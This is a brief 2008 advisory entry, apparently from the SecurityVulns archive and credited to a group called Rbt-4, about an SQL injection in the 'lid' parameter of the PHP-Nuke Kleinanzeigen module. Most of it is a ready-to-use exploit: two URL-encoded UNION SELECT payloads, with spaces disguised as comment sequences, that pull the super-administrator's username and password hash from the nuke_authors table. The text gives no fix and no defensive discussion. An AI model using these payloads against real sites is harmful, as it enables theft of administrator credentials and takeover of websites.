PHP-NUKE module Kleinanzeigen SQL injection (lid)

2008-08-07T00:00:00
ID SECURITYVULNS:DOC:20305
Type securityvulns
Reporter Securityvulns
Modified 2008-08-07T00:00:00

Description

Rbt-4 crew

http://www.rbt-4.net

Author : Lovebug

----------------------------

Remote Sql injection Php-Nuke module name Kleinanzeigen

modules.php?name=Kleinanzeigen&a_op=visit&lid=[sql]

Exploit

username :

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

pwd :

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A